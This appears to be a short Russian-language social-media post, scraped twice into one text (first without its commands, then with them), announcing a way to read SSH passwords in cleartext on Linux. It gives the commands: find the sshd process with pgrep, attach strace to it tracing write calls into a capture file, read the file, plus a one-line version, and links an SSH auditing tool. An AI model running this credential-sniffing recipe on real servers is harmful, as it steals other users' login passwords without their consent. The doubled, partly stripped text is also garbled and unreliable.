Новость бударажущая ум и представление о безопасности Linux*
Так сказать мир был до этой новости и теперь…
—
Получаем пароль от SSH в открытом виде
1. получаем точный идентификатор sshd
2. Отслеживаем системные вызовы
Ну или одной строкой
Для танкистов - смотрите вывод
А еще более печально, есть тула
https://github.com/ncsa/ssh-auditor
#ssh #sniff #password
Так сказать мир был до этой новости и теперь…
—
Получаем пароль от SSH в открытом виде
1. получаем точный идентификатор sshd
pgrep -l sshd
2. Отслеживаем системные вызовы
strace -f -p <ssh_PID> -e trace=write -o capture
Ну или одной строкой
strace -f -p $(service sshd status |grep PID|awk "{print \$3}") -e trace=write -o capture
Для танкистов - смотрите вывод
cat capture
А еще более печально, есть тула
https://github.com/ncsa/ssh-auditor
#ssh #sniff #password